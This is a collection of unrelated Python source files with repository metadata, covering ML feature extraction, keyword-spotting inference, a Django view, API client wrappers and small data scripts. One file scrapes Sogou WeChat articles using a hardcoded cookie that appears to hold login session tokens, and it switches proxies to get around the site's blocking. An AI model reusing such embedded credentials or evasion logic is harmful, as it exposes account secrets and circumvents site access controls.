dets = loader.dets
num_dets = len(dets)
assert sum([len(image['det_ids']) for image in images]) == num_dets
# load mrcn model
mrcn = inference_no_imdb.Inference(args)
# feats_h5
# HERE
file_name = 'matt_feats_%s.h5' % id_str
feats_h5 = osp.join('cache/feats', dataset_splitBy, 'mrcn', file_name)
f = h5py.File(feats_h5, 'w')
fc7_set = f.create_dataset('fc7', (num_dets, 2048), dtype=np.float32)
pool5_set = f.create_dataset('pool5', (num_dets, 1024), dtype=np.float32)
# extract
feats_dir = '%s_%s_%s' % (args.net_name, args.imdb_name, args.tag)
head_feats_dir=osp.join('cache/feats/', dataset_splitBy, 'mrcn', feats_dir)
for i, image in enumerate(images):
image_id = image['image_id']
net_conv, im_info = image_to_head(head_feats_dir, image_id)
det_ids = image['det_ids']
for det_id in det_ids:
det = loader.Dets[det_id]
det_pool5, det_fc7 = det_to_pool5_fc7(mrcn, det, net_conv, im_info)
det_h5_id = det['h5_id']
fc7_set[det_h5_id] = det_fc7.data.cpu().numpy()
pool5_set[det_h5_id] = det_pool5.data.cpu().numpy()
if i % 20 == 0:
print('%s/%s done.' % (i+1, len(images)))
f.close()
print('%s written.' % feats_h5)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--imdb_name', default='coco_minus_refer', help='image databased trained on.')
parser.add_argument('--net_name', default='res101')
parser.add_argument('--iters', default=1250000, type=int)
parser.add_argument('--tag', default='notime')
parser.add_argument('--dataset', type=str, default='refcoco', help='dataset name: refclef, refcoco, refcoco+, refcocog')
parser.add_argument('--splitBy', type=str, default='unc', help='splitBy: unc, google, berkeley')
parser.add_argument('--tid', type=str, required=True)
parser.add_argument('--top-N', type=int, default=8)
parser.add_argument('--m', type=str, required=True)
args = parser.parse_args()
main(args)
| [
"[email protected]"
] | |
450df24a0679c4015376c3e8d2f9ac476ba74b85 | c96735e137fde34ee3fab346c0c4e1e2e282cdb8 | /velkoz_web_application_django/dashboard_core/views.py | ad26600b9015bfe425dbb8cac9b65af3f7783344 | [
"MIT"
] | permissive | MatthewTe/velkoz_backend_applications | ff6a382f40a8b1113740cd5fd3e590566b892935 | 023dbcfbf64a79316e389b109e8a2069a2a8f7cc | refs/heads/main | 2023-01-21T23:24:24.976751 | 2020-11-30T03:31:07 | 2020-11-30T03:31:07 | 303,871,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,472 | py | from django.shortcuts import render
# Importing database models:
from .models import ExternalDatabase
# Main index/home page:
def main_index(request):
"""
    The main index view renders the main HTML template for the Django project,
    summarizing the status of all connected external databases. It queries the
    Django database for all instances of the ‘ExternalDatabase’ model and passes
    the resulting QuerySet to the template. The view function is deliberately
    bare-bones: most of the summary information displayed on the main_index.html
    page comes from the ‘ExternalDatabase’ model and is rendered dynamically, so
    most of the logic for the main index page lives in the Django template
    itself.
Args:
request (http request): The http request that is sent to the server from
the client.
Returns:
django.shortcuts.render: The django template rendered as html with full
context.
"""
# Querying database for all instances of ExternalDatabase objects:
all_external_databases = ExternalDatabase.objects.all()
# Building context to pass to template:
context = {
'external_databases' : all_external_databases
}
return render(request, "dashboard_core/main_index.html", context=context)
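# Minimal shell exercise of the view (sketch; assumes a configured Django
# project with this app installed and migrated):
# >>> from django.test import RequestFactory
# >>> response = main_index(RequestFactory().get('/'))
# >>> response.status_code   # -> 200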
| [
"[email protected]"
] | |
64ee8b22eff52784e22e086e13d62ef9fbf0f99e | 7a71a046ec75a1a8b33465371cea21f393bf2102 | /untitled folder/numbers.py | ae82f4a02b2bddded09389e0d149229b276a4772 | [] | no_license | huda88/ALGO | a23cb5d66a2abdb58454c4f342385d72c5776b20 | 86d664f9d7ec9940ebfdad2e5ff943ffb6c00c65 | refs/heads/master | 2021-01-19T16:50:20.467957 | 2015-05-05T08:48:44 | 2015-05-05T08:48:44 | 35,088,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | import sys
A=[]
for line in sys.stdin:
for word in line.strip().split():
A.append(int(word))
total = 0
mi = A[0]
ma = A[0]
for number in A:
    total += number
    if number < mi:
        mi = number
    elif number > ma:
        ma = number
average = float(total) / len(A)
print ("minimum:" , mi, '\n'
"maximum:" , ma, '\n'
"average:" , average) | [
"[email protected]"
] | |
827e3cb4d173d05081ecd59185cc57b8c17ceb51 | 7f0fc279a87cce4a50d726103559ba596cc578dd | /my_test_pb.py | 1014305d272c09c423d428f3e1c0873e8cfce3f5 | [
"Apache-2.0"
] | permissive | yylcandy/ML-KWS-for-MCU | c0bac93e547f3806dfd4bae180e471cb2278eb87 | 83657bb7ea7847cd7d61ba5a039a365d1379f0f8 | refs/heads/master | 2020-08-09T15:40:00.089097 | 2019-10-17T09:55:13 | 2019-10-17T09:55:13 | 214,116,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,364 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# Modifications Copyright 2017-18 Arm Inc. All Rights Reserved.
# Adapted from freeze.py to run inference on train/val/test dataset on the
# trained model in the form of pb
#
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os.path
import sys
import tensorflow as tf
import input_data
import models
from tensorflow.contrib.framework.python.ops import audio_ops as contrib_audio
from tensorflow.python.ops import io_ops
def load_graph(filename):
"""Unpersists graph from file as default graph."""
with tf.gfile.FastGFile(filename, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
tf.import_graph_def(graph_def, name='')
def wav2Input(filename, model_settings):
  # Loads a wav file and converts it to the MFCC feature array the frozen
  # graph expects, shaped (1, n_frames, dct_coefficient_count).
  #print('wav2Input ', filename)
desired_samples = model_settings['desired_samples']
foreground_volume=1
time_shift_padding=[[0, 0], [0, 0]]
time_shift_offset=[0,0]
#background_data=0
#background_volume=0
wav_loader = io_ops.read_file(filename)
wav_decoder = contrib_audio.decode_wav(
wav_loader, desired_channels=1, desired_samples=desired_samples)
#scaled_foreground = tf.multiply(wav_decoder.audio, foreground_volume)
#padded_foreground = tf.pad(scaled_foreground, time_shift_padding, mode='CONSTANT')
#sliced_foreground = tf.slice(padded_foreground, time_shift_offset, [desired_samples, -1])
#background_mul = tf.multiply(background_data, background_volume)
#background_add = tf.add(background_mul, sliced_foreground)
background_clamp = tf.clip_by_value(wav_decoder.audio, -1.0, 1.0)
spectrogram = contrib_audio.audio_spectrogram(
background_clamp,
window_size=model_settings['window_size_samples'],
stride=model_settings['window_stride_samples'],
magnitude_squared=True)
mfcc= contrib_audio.mfcc(
spectrogram,
wav_decoder.sample_rate,
dct_coefficient_count=model_settings['dct_coefficient_count'])
mfcc=tf.clip_by_value(mfcc, -10.0, 127.0)
with tf.Session() as sess:
mfcc=sess.run(mfcc)
return mfcc
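# Shape sketch (assumption, using the default flags below): for 1 s of
# 16 kHz audio with 30 ms windows, 10 ms stride and 40 DCT coefficients,
# >>> feats = wav2Input('some_clip.wav', model_settings)   # path is hypothetical
# >>> feats.shape   # -> (1, 98, 40)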
def run_inference_pb(wanted_words, sample_rate, clip_duration_ms,
window_size_ms, window_stride_ms, dct_coefficient_count,
model_architecture, model_size_info):
"""Creates an audio model with the nodes needed for inference.
Uses the supplied arguments to create a model, and inserts the input and
output nodes that are needed to use the graph for inference.
Args:
wanted_words: Comma-separated list of the words we're trying to recognize.
sample_rate: How many samples per second are in the input audio files.
clip_duration_ms: How many samples to analyze for the audio pattern.
window_size_ms: Time slice duration to estimate frequencies from.
window_stride_ms: How far apart time slices should be.
dct_coefficient_count: Number of frequency bands to analyze.
model_architecture: Name of the kind of model to generate.
model_size_info: Model dimensions : different lengths for different models
"""
tf.logging.set_verbosity(tf.logging.INFO)
sess = tf.InteractiveSession()
words_list = input_data.prepare_words_list(wanted_words.split(','))
model_settings = models.prepare_model_settings(
len(words_list), sample_rate, clip_duration_ms, window_size_ms,
window_stride_ms, dct_coefficient_count)
load_graph(FLAGS.graph)
audio_processor = input_data.AudioProcessor(
FLAGS.data_url, FLAGS.data_dir, FLAGS.silence_percentage,
FLAGS.unknown_percentage,
FLAGS.wanted_words.split(','), FLAGS.validation_percentage,
FLAGS.testing_percentage, model_settings)
softmax = sess.graph.get_tensor_by_name("labels_softmax:0")
label_count = model_settings['label_count']
ground_truth_input = tf.placeholder(
tf.float32, [None, label_count], name='groundtruth_input')
predicted_indices = tf.argmax(softmax, 1)
expected_indices = tf.argmax(ground_truth_input, 1)
correct_prediction = tf.equal(predicted_indices, expected_indices)
confusion_matrix = tf.confusion_matrix(
expected_indices, predicted_indices, num_classes=label_count)
evaluation_step = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
if(FLAGS.training):
# training set
set_size = audio_processor.set_size('training')
tf.logging.info('Training set size:%d', set_size)
total_accuracy = 0
total_conf_matrix = None
for i in range(0, set_size):
training_file, training_ground_truth = (
audio_processor.get_wav_files(1, i, model_settings, 'training'))
with open(training_file[0], 'rb') as wav_file:
training_data = wav_file.read()
training_accuracy, conf_matrix = sess.run(
[evaluation_step, confusion_matrix],
feed_dict={
'wav_data:0': training_data,
ground_truth_input: training_ground_truth,
})
total_accuracy += (training_accuracy) / set_size
if total_conf_matrix is None:
total_conf_matrix = conf_matrix
else:
total_conf_matrix += conf_matrix
tf.logging.info('Confusion Matrix:\n %s' % (total_conf_matrix))
tf.logging.info('Training accuracy = %.2f%% (N=%d)' % (total_accuracy * 100,
set_size))
'''
# validation set
set_size = audio_processor.set_size('validation')
tf.logging.info('Validation set size:%d', set_size)
total_accuracy = 0
total_conf_matrix = None
for i in range(0, set_size):
validation_file, validation_ground_truth = (
audio_processor.get_wav_files(1, i, model_settings, 'validation'))
#with open(validation_file[0], 'rb') as wav_file:
#validation_data = wav_file.read()
validation_data=wav2Input(validation_file[0], model_settings)
validation_accuracy, conf_matrix = sess.run(
[evaluation_step, confusion_matrix],
feed_dict={
'wav_data:0': validation_data,
ground_truth_input: validation_ground_truth,
})
total_accuracy += (validation_accuracy) / set_size
print(total_accuracy, '/', i)
if total_conf_matrix is None:
total_conf_matrix = conf_matrix
else:
total_conf_matrix += conf_matrix
tf.logging.info('Confusion Matrix:\n %s' % (total_conf_matrix))
tf.logging.info('Validation accuracy = %.2f%% (N=%d)' %
(total_accuracy * 100, set_size)) '''
# test set
set_size = audio_processor.set_size('testing')
tf.logging.info('Test set size:%d', set_size)
total_accuracy = 0
total_conf_matrix = None
for i in range(0, set_size):
test_file, test_ground_truth = (
audio_processor.get_wav_files(1, i, model_settings, 'testing'))
test_data=wav2Input(test_file[0], model_settings)
test_accuracy, conf_matrix = sess.run(
[evaluation_step, confusion_matrix],
feed_dict={
'wav_data:0': test_data,
ground_truth_input: test_ground_truth,
})
total_accuracy += (test_accuracy) / set_size
if total_conf_matrix is None:
total_conf_matrix = conf_matrix
else:
total_conf_matrix += conf_matrix
tf.logging.info('Confusion Matrix:\n %s' % (total_conf_matrix))
tf.logging.info('Test accuracy = %.2f%% (N=%d)' % (total_accuracy * 100,
set_size))
def main(_):
# Create the model, load weights from pb and run on train/val/test
run_inference_pb(FLAGS.wanted_words, FLAGS.sample_rate,
FLAGS.clip_duration_ms, FLAGS.window_size_ms,
FLAGS.window_stride_ms, FLAGS.dct_coefficient_count,
FLAGS.model_architecture, FLAGS.model_size_info)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_url',
type=str,
# pylint: disable=line-too-long
default='http://download.tensorflow.org/data/speech_commands_v0.02.tar.gz',
# pylint: enable=line-too-long
help='Location of speech training data archive on the web.')
parser.add_argument(
'--data_dir',
type=str,
default='/tmp/speech_dataset/',
help="""\
Where to download the speech training data to.
""")
parser.add_argument(
'--graph', type=str, default='', help='Model to use for identification.')
parser.add_argument(
'--silence_percentage',
type=float,
default=10.0,
help="""\
How much of the training data should be silence.
""")
parser.add_argument(
'--unknown_percentage',
type=float,
default=10.0,
help="""\
How much of the training data should be unknown words.
""")
parser.add_argument(
'--testing_percentage',
type=int,
default=10,
help='What percentage of wavs to use as a test set.')
parser.add_argument(
'--validation_percentage',
type=int,
default=10,
help='What percentage of wavs to use as a validation set.')
parser.add_argument(
'--sample_rate',
type=int,
default=16000,
help='Expected sample rate of the wavs',)
parser.add_argument(
'--clip_duration_ms',
type=int,
default=1000,
help='Expected duration in milliseconds of the wavs',)
parser.add_argument(
'--window_size_ms',
type=float,
default=30.0,
help='How long each spectrogram timeslice is',)
parser.add_argument(
'--window_stride_ms',
type=float,
default=10.0,
help='How long each spectrogram timeslice is',)
parser.add_argument(
'--dct_coefficient_count',
type=int,
default=40,
help='How many bins to use for the MFCC fingerprint',)
parser.add_argument(
'--batch_size',
type=int,
default=100,
help='How many items to train with at once',)
parser.add_argument(
'--wanted_words',
type=str,
default='yes,no,up,down,left,right,on,off,stop,go',
help='Words to use (others will be added to an unknown label)',)
parser.add_argument(
'--model_architecture',
type=str,
default='dnn',
help='What model architecture to use')
parser.add_argument(
'--model_size_info',
type=int,
nargs="+",
default=[128,128,128],
help='Model dimensions - different for various models')
parser.add_argument(
'--training',
action='store_true',
default=False,
help='run on training (1) or not (0)',)
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| [
"[email protected]"
] | |
e8f3976e2b6dcc07cb4fe0b885c28f90cd4437d2 | 27df5a1e656803be5e9330283dd0d45d53c3d33c | /python/lovetriangle.py | 672169c91c90d648944d462a1911bed796bb8e3d | [] | no_license | Gowtham-M1729/HackerearthPrograms | 6588e46c72604a169d7303d74d47850a41153608 | 7ea8131c5fa1e13cf0afe5248305246a6b26793e | refs/heads/master | 2023-07-11T08:24:21.303599 | 2021-08-16T18:07:44 | 2021-08-16T18:07:44 | null | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | def sol(k):
if(k<9):
return k;
else:
        return k%9+10*sol(k//9)
while True:
try:
i =int(input())
print(sol(i))
except EOFError:
break
| [
"gowtham1842001.com"
] | gowtham1842001.com |
5c7ce685f81772301dbea7562573aa722012d178 | 5d07b568f7237343a4d2eea946474829f5797d0f | /spider.py | 46ea117a0f474328351de31a321baa2f6640ef31 | [] | no_license | LiHedog/crawls-sougou-s-wechat-article | eff526837a1bca126558bf464acc2536dc2af35f | a692e876aee33bc5f052b159f9c5cb432e4dcc04 | refs/heads/master | 2020-04-28T03:53:02.745382 | 2019-03-11T08:26:04 | 2019-03-11T08:26:04 | 174,955,450 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,035 | py | from urllib.parse import urlencode
import requests
from requests.exceptions import ConnectionError
from pyquery import PyQuery as pq
import pymongo
client = pymongo.MongoClient('localhost')
db = client['weixin']
base_url = 'https://weixin.sogou.com/weixin?'
headers = {
'Cookie': 'SUV=1545909958456327; SMYUV=1545909958457919; UM_distinctid=167ef69fb3035b-044183a787f426-b781636-1fa400-167ef69fb31346; _ga=GA1.2.1338857850.1546843672; CXID=D6C79E5AB5C9C7D9BB390F3FFF05A8A8; SUID=6F845F704C238B0A5C655E67000DF4F1; ad=Tyllllllll2tBqiXlllllVeOgf7llllltVM9bZllllylllllROxlw@@@@@@@@@@@; IPLOC=CN4403; cd=1550728372&138422711c1aa405e872165f18c55c82; rd=olllllllll2tb0hHgpcDHVem53Ctb0h1LPJBbZllll9llllxVylll5@@@@@@@@@@; ld=0yllllllll2tb0hHgpcDHVei27Ctb0h1LPJBbZllll9llllllylll5@@@@@@@@@@; LSTMV=259%2C213; LCLKINT=2175; ABTEST=8|1551766043|v1; weixinIndexVisited=1; sct=1; JSESSIONID=aaayESATQzgHc9WnlyZKw; ppinf=5|1551766259|1552975859|dHJ1c3Q6MToxfGNsaWVudGlkOjQ6MjAxN3x1bmlxbmFtZToyMDpEUiVFOCU5MyU5RCVFNyU5MyU5Q3xjcnQ6MTA6MTU1MTc2NjI1OXxyZWZuaWNrOjIwOkRSJUU4JTkzJTlEJUU3JTkzJTlDfHVzZXJpZDo0NDpvOXQybHVPQU1KUUxVYjREanQxcG43LXhraGpVQHdlaXhpbi5zb2h1LmNvbXw; pprdig=acd4Pnfzn8nxX0PafcW8OjwZh3qDbOD7yAmSRBIWxi451i_LPAeZ1WxBdnSnDJVThSeqDfhlmQ16fU8FLweWjcGPZQhltJQJkGF0rmZGZoqVoKmxyY0ptdSPkEaMZAbCc5zrpZuu0IKHD57L8u5GSiAyWJ-0KiwhflCSczoJ0r8; sgid=06-37472631-AVxibEvOmRDkcQC32cmxFVicM; ppmdig=1551766260000000e140a563eaa123145908f5b82ed4a3a9; PHPSESSID=lts8eof02o4efm62gvj4679i81; SNUID=F7C18A43989D1ACA59EF2B8A990A12B0; seccodeRight=success; successCount=1|Tue, 05 Mar 2019 06:17:21 GMT',
'Host': 'weixin.sogou.com',
'Referer': 'https://weixin.sogou.com/weixin?query=%E9%A3%8E%E6%99%AF&_sug_type_=&sut=5079&lkt=7%2C1551766084967%2C1551766090031&s_from=input&_sug_=y&type=2&sst0=1551766090134&page=99&ie=utf8',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36'
}
keyword = '风景'
proxy_pool_url = 'http://127.0.0.1:5000/get'
proxy = None
max_count = 10000000
def get_proxy():
try:
response = requests.get(proxy_pool_url)
if response.status_code == 200:
return response.text
return None
except ConnectionError:
return None
def get_html(url, count=1):
    print('Crawling', url)
print('Trying Count', count)
global proxy
if count >= max_count:
        print('Tried Too Many Counts')
return None
try:
if proxy:
proxies = {
'http': 'http://' + proxy
}
response = requests.get(url, allow_redirects=False, headers=headers, proxies = proxies)
else:
response = requests.get(url, allow_redirects=False, headers=headers)
if response.status_code == 200:
return response.text
if response.status_code == 302:
print(302)
proxy = get_proxy()
if proxy:
print('Using Proxy', proxy)
return get_html(url)
else:
print('Get Proxy Failed')
return None
except ConnectionError as e:
print('Error Occurred', e.args)
proxy = get_proxy()
count += 1
return get_html(url, count)
def get_index(keyword, page):
data = {
'query': keyword,
'type': 2,
'page': page
}
queries = urlencode(data)
url = base_url + queries
html = get_html(url)
return html
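# e.g. get_index('风景', 2) requests the URL-encoded address (sketch):
# https://weixin.sogou.com/weixin?query=%E9%A3%8E%E6%99%AF&type=2&page=2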
def parse_index(html):
doc = pq(html)
items = doc('.news-box .news-list li .txt-box h3 a').items()
for item in items:
yield item.attr('href')
def get_detail(url):
try:
response = requests.get(url)
if response.status_code == 200:
return response.text
return None
except ConnectionError:
return None
def parse_detail(html):
doc = pq(html)
title = doc('.rich_media_title').text()
content = doc('.rich_media_content ').text()
date = doc('#publish-time').text()
nickname = doc('#js_profile_qrcode > div > strong').text()
wechat = doc('#js_profile_qrcode > div > p:nth-child(3) > span').text()
return {
'title': title,
'content': content,
'data': date,
'nickname': nickname,
'wechat': wechat
}
def save_to_mongo(data):
if db['articles'].update({'title': data['title']}, {'$set': data}, True):
print('Save to Mongo', data['title'])
else:
        print('Save to Mongo Failed', data['title'])
def main():
for page in range(1, 100):
html = get_index(keyword, page)
if html:
article_urls = parse_index(html)
for article_url in article_urls:
                article_html = get_detail(article_url)
if article_html:
article_data = parse_detail(article_html)
print(article_data)
save_to_mongo(article_data)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
04d18211b9700e6ac030a2709df3e0b16d47d74a | e1c36cb4ceb7edd7e6780b96e148ab7e2d0d140c | /.venv/bin/black | d7f4a080fee4d4a5dee07405382efe8e12c097bc | [] | no_license | dengyijia/chicago | e0c89ad9efaa32bfa019fafef5efbbfcb08c10d9 | 4a8f74ca7348db94392f780114b8c6f8b6d24920 | refs/heads/master | 2022-12-15T15:50:39.134209 | 2020-09-10T00:18:03 | 2020-09-10T00:18:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | #!/Users/nasr.maswood/code/chicago/.venv/bin/python3
# EASY-INSTALL-ENTRY-SCRIPT: 'black','console_scripts','black'
__requires__ = 'black'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('black', 'console_scripts', 'black')()
)
| [
"[email protected]"
] | ||
e4a8b6985f4178e773dbf0b1bbf7f2a5edaf1dd7 | 13391bb116ca5e4dcee49c58029857c1c419e5fb | /goc_client/v1/client.py | 1a4ca066184baaf6644caa84a9a88dfdd8849c46 | [] | no_license | Nigo-Liu/Python | cb501ed606f9019ec01ca646fdd2cdc07f3c2ee1 | 56fb0732ca468aa792cbd060e40fedbadbc5a649 | refs/heads/master | 2021-06-26T19:30:40.210429 | 2020-10-13T07:11:11 | 2020-10-13T07:11:11 | 154,466,751 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,814 | py | # coding=UTF-8
from gocloud.client.v1 import logs, categories, solutions, images, servers
from gocloud.client.v1 import groups, volumes, users
from gocloud.client.v1 import sites
from gocloud.client.v1 import snapshots
from gocloud.client.v1 import networks
from gocloud.client.v1 import lbs
from gocloud.client.v1 import repositories
from gocloud.client.v1 import security_groups
from gocloud.client.v1 import infra
from gocloud.client.v1 import version
from gocloud.client.v1 import availability_zones
from gocloud.client.v1 import keypairs
from gocloud.client.v1 import notifications
from gocloud.client.v1 import flavors
class Client():
def __init__(self, request, ip):
self.users = users.Users(request, ip)
self.logs = logs.Logs(request, ip)
self.categories = categories.Categories(request, ip)
self.solutions = solutions.Solutions(request, ip)
self.images = images.Images(request, ip)
self.servers = servers.Servers(request, ip)
self.groups = groups.Groups(request, ip)
self.volumes = volumes.Volumes(request, ip)
self.sites = sites.Sites(request, ip)
self.snapshots = snapshots.Snapshots(request, ip)
self.networks = networks.Networks(request, ip)
self.lbs = lbs.LoadBalancers(request, ip)
self.flavors = flavors.Flavors(request, ip)
self.security_groups = security_groups.Security_groups(request, ip)
self.repositories = repositories.Repositories(request, ip)
self.infra = infra.Infra(request, ip)
self.version = version.Version(request, ip)
self.availability_zones =\
availability_zones.AvailabilityZones(request, ip)
self.keypairs = keypairs.Keypairs(request, ip)
self.notifications = notifications.Notifications(request, ip)
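# Usage sketch (the request object and endpoint IP below are placeholders):
# >>> client = Client(request, '10.0.0.1')
# >>> client.servers, client.volumes   # per-resource API wrappers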
| [
"[email protected]"
] | |
012a97e548d3dc1165108940cd9f55b4cebb3037 | 2ad5bcf1c03cd6e20a85bd3b1d7a01cca8767bdc | /Device_Library/device_query.py | 5e7a427227f5e64954eae52df582bdcda05a735d | [] | no_license | koarakawaii/Device_Library | a8285e36a1354dfb439d3b3bf1fc98964d05f236 | d3ce870834747801e640232b5827b44a08e43f8e | refs/heads/master | 2023-01-24T13:06:41.707745 | 2020-11-18T20:07:31 | 2020-11-18T20:07:31 | 283,691,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | #!/usr/bin/env python
# coding: utf-8
import pyvisa as visa
def GPIB_QUERY():
rm = visa.ResourceManager()
print(rm.list_resources())
return rm
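# Usage sketch: with an instrument attached, GPIB_QUERY() prints something
# like ('GPIB0::12::INSTR',) (address is illustrative) and returns the
# pyvisa ResourceManager for further use:
# >>> rm = GPIB_QUERY()
# >>> inst = rm.open_resource('GPIB0::12::INSTR')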
| [
"[email protected]"
] | |
cde4e5f1879a219342123c077b672b7d4ac43dc2 | ab5b1cdd69920a9bb6333082c45cf4a88f521fa5 | /part1.py | 45f89685bb941ce7089c9e743cdc0fb9ddef4d37 | [] | no_license | mgillespie19/machine_learning_attackLab | e87e2822cdeed7be173235656264188f23725caf | 0c564bb6511880e6c5dc839126c184634f3f9ad5 | refs/heads/master | 2020-05-04T22:04:51.809507 | 2019-04-04T14:24:11 | 2019-04-04T14:24:11 | 179,498,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 982 | py | #ignore complex numbers going into the matrix
import sklearn
from sklearn import preprocessing
from sklearn.ensemble import RandomForestRegressor
import numpy as np
import csv
f = open("Lab8_feature_data.csv")
f.readline()
data = [row for row in csv.reader(f)]
for i in range(0, len(data)):
for j in range(0, len(data[i])):
data[i][j] = data[i][j].replace('(','').replace(')','')
data[i][j] = np.complex(data[i][j]).real
data = preprocessing.scale(data)
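# preprocessing.scale standardizes each column to zero mean / unit variance, e.g.
# >>> preprocessing.scale([[1.0], [3.0]])   # -> array([[-1.], [ 1.]])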
x = np.delete(data, np.s_[71:73], axis=1)
y = np.delete(data, np.s_[0:73], axis=1)
x_test = x[23552:29539]
x_train = x[0:23552]
y_test = y[23552:29539]
y_train = y[0:23552]
print(y_test)
# linreg = RandomForestRegressor(oob_score=True)
#
# linreg.fit(x_train, y_train)
# y_pred = linreg.predict(x_test)
# print(y_pred)
# PROOF Y IS WORKING
# for key in y:
# print(key[0])
# PROOF X IS WORKING
# for row in x:
# print("---------NEW ROW--------")
# for cell in row:
# print(cell)
| [
"[email protected]"
] | |
69bc3d840fa879e2cb72dd93b872aef1558f5ca7 | 5db3009eb36afe7110ed5402be3a9e570c58c540 | /my_plugins/YouCompleteMe/third_party/ycmd/ycmd/completers/python/hook.py | 875d081eac70987e439d832a1fbf917bbf0c8689 | [
"GPL-3.0-only",
"GPL-1.0-or-later",
"MIT"
] | permissive | imfangli/vimrc | ced2c6caece1cf19421c6ea7deb017bec4ca3a27 | d2d14e7d083d70cc8627ddccb5b99c53c3c38be3 | refs/heads/master | 2022-02-01T00:34:31.855421 | 2022-01-22T15:57:28 | 2022-01-22T15:57:28 | 211,766,038 | 2 | 0 | MIT | 2019-09-30T03:15:03 | 2019-09-30T03:15:02 | null | UTF-8 | Python | false | false | 1,106 | py | # Copyright (C) 2011, 2012 Stephen Sugden <[email protected]>
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from ycmd.completers.python.python_completer import PythonCompleter
def GetCompleter( user_options ):
return PythonCompleter( user_options )
| [
"[email protected]"
] | |
996c6280c55b81f5acba29c1857b5b484ee57cec | eb60abe836cb21276c3b41fb8584a5c2f707fd8f | /module1-introduction-to-sql/buddymove_holidayiq.py | acacb1b0d431b7f920d6f8620e69abda42885b0d | [
"MIT"
] | permissive | ToddMG/DS-Unit-3-Sprint-2-SQL-and-Databases | edc55be7ee60072ae3b06eb7977a755f1402a965 | 7e226039d14e7771d2b6c0b8336b1bc19d9121db | refs/heads/master | 2020-08-08T06:44:10.694545 | 2019-11-07T20:11:03 | 2019-11-07T20:11:03 | 213,762,739 | 0 | 0 | MIT | 2019-10-08T21:53:59 | 2019-10-08T21:53:59 | null | UTF-8 | Python | false | false | 1,070 | py | import sqlite3
import pandas as pd
df = pd.read_csv('buddymove_holidayiq.csv')
print(df)
conn = sqlite3.connect('buddymove_holidayiq.sqlite3')
df.to_sql('review', con=conn)
q1 = conn.execute('SELECT COUNT(*) FROM review').fetchone()
q2 = conn.execute('SELECT COUNT(*) FROM review WHERE Nature >= 100 AND Shopping >= 100').fetchall()
sports_avg = conn.execute('SELECT AVG(Sports) FROM review;').fetchone()
rel_avg = conn.execute('SELECT AVG(Religious) FROM review;').fetchone()
nat_avg = conn.execute('SELECT AVG(Nature) FROM review;').fetchone()
tht_avg = conn.execute('SELECT AVG(Theatre) FROM review;').fetchone()
shp_avg = conn.execute('SELECT AVG(Shopping) FROM review;').fetchone()
pic_avg = conn.execute('SELECT AVG(Picnic) FROM review;').fetchone()
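# Note: the six AVG queries above could equivalently be fetched in one round trip:
# >>> conn.execute('SELECT AVG(Sports), AVG(Religious), AVG(Nature), '
# ...              'AVG(Theatre), AVG(Shopping), AVG(Picnic) FROM review;').fetchone()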
q3 = {'Sports average':sports_avg, 'Religious Average':rel_avg, 'Nature Average':nat_avg,
'Theatre Average':tht_avg, 'Shopping Average': shp_avg, 'Picnic Average':pic_avg}
print('Total number of rows:', q1)
print('Users who reviewed at least 100 in Nature and Shopping:', q2)
print(q3)
conn.close()
| [
"[email protected]"
] | |
0a0656216cb0cf8cdfd429c62ce6abd151e9fb21 | 49945f5630ed074922876836d5af9f6faf71d085 | /assessing.py | 04b93c25eadd2d9334596713ed33d3cb1957ddb6 | [
"MIT"
] | permissive | nealchenzhang/TAAlgo | 492881abd38845ae018d589b60325ee3171c7e95 | 92159efcc5d657a9caf79a026491e1decf406b06 | refs/heads/master | 2020-04-16T22:43:00.492209 | 2019-05-21T15:19:20 | 2019-05-21T15:19:20 | 165,980,496 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,697 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 12 15:41:25 2019
@author: chen zhang
"""
import numpy as np
import pandas as pd
from scipy import stats
# Holding Periods
# Price target
# Predefined time limit
# Stop loss
# Passive or fixed time periods
# Assessing the Performance of Trading Signals
def pair_test(ys, signal, hp=5, rtn_type='log'):
"""
:param ys: original data Series
:param signal: signal Series generated with time index
:param hp: predefined fixed holding periods
